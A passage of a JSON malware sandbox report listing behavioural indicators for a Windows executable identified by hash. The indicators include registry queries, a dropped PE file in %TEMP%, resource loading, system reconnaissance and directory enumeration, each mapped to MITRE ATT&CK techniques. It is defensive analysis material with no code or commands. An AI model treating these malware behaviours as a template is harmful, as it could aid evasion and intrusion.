"\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"B4B66AA6F8F2C5F8C7A6DF70B5B6DD96356199E6B00066F8D6FB54C868D45026\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\version.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" queries volume information of \"C:\\\" at 00000000-00002508-0000010C-162931\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-1124744\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003000-0000010C-1897398", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002944)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" queries volume information of \"C:\\\" at 00000000-00002508-0000010C-162931\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002944-0000010C-1124744\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003000-0000010C-1897398", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00b8242a00b3242a00000000000000000000002700000000019cdd22000000000000eb220095e1b2776bd11400feffffff435cb6775059b677aa000000b8000000b2242a00b0242a0024df22005ce32200000000000000000000000000000000000000000000000000a0090000000027001c5cb57760d8c775ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edb677da242a00a06a8c758600000024df22005ce322000000000086008800a06a8c7524df2200916c8c75da242a00a06a8c75a06a8c7594e3220002020000 (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002508)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c00a8672c00a3672c00000000000000000000002900000000019cdc22000000000000ea220095e1b27763db1400feffffff435cb6775059b677aa000000b8000000a2672c00a0672c0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5cb57760d8c775ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edb677ca672c00a06a8c758600000024de22005ce222000000000086008800a06a8c7524de2200916c8c75ca672c00a06a8c75a06a8c7594e2220002020000 (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00b777d600b777ff3c807770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002944)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003000)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002508)\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002508)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n 